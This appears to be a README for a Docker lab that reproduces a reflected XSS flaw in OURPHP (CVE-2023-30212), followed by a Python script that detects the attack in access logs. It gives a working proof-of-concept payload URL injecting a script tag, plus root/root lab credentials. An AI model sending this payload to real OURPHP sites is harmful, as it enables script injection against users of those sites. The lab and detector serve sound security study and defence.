This repository contains the directories and Dockerfile needed to replicate an XSS vulnerability in OURPHP (CVE-2023-30212).
PREREQUISITES
Install Docker:
sudo apt install -y docker.io
Download the files from this repository using git clone
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git
The repository contains the directories and Dockerfile needed to replicate the scenario.
After downloading the files, build a Docker image using
sudo docker build -t <Give_Suitable_Docker_name> .
! Give the Docker image a name so that it can be referenced later.
Start a container from the Docker image by using
sudo docker run -d -p 80:80 <Docker_Image_Name>
! Here port 80 of the container is mapped to port 80 on the host.
To see the status of the Docker container, run
sudo docker ps
After completing these steps, open http://localhost in a browser and configure OURPHP with the following credentials:
Username: root
Password: root
Database Name: data
Next, configure the username and password for the administrator account. Set the following and proceed:
Username: root
Password: root
The payload is
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
Append this to http://localhost or http://127.0.0.1 in the browser to trigger the XSS.
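One way to spot this request in web server access logs, as an added example that is not part of the original repository. The path and parameter name come from the payload above; the log lines, the common/combined log format and the rule that a legitimate `out` value never contains markup or quote characters are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter come from the payload on this page.
TARGET_PATH = "/client/manage/ourphp_out.php"
PARAM = "out"
# Assumption: a legitimate `out` value never contains markup or quote characters.
MARKUP = re.compile(r"[<>\"']")
# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not captured traffic.
PREFIX = '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    PREFIX + TARGET_PATH + '?ourphp_admin=logout&out=%3C/script%3E%3Cscript%3E'
    'alert(%22xss%22)%3C/script%3E HTTP/1.1" 200 512',
    PREFIX + TARGET_PATH + '?ourphp_admin=logout&out=index HTTP/1.1" 200 310',
    PREFIX + TARGET_PATH + '?ourphp_admin=logout&out=%253C%2Fscript%253E%253Cscript%253E'
    'alert(1)%253C%2Fscript%253E HTTP/1.1" 200 512',
    PREFIX + '/index.php?out=%3Cb%3E HTTP/1.1" 200 120',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so a double-encoded value is normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for requests with markup in `out`."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a parsable request line
        url = urlsplit(match.group(1))
        if unquote(url.path).lower() != TARGET_PATH:
            continue  # some other script
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)  # parse_qs has already decoded once
            if MARKUP.search(value):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: out={value!r}")
```

Run against the container's own access log, the same function shows whether the lab request was recorded and in what encoded form.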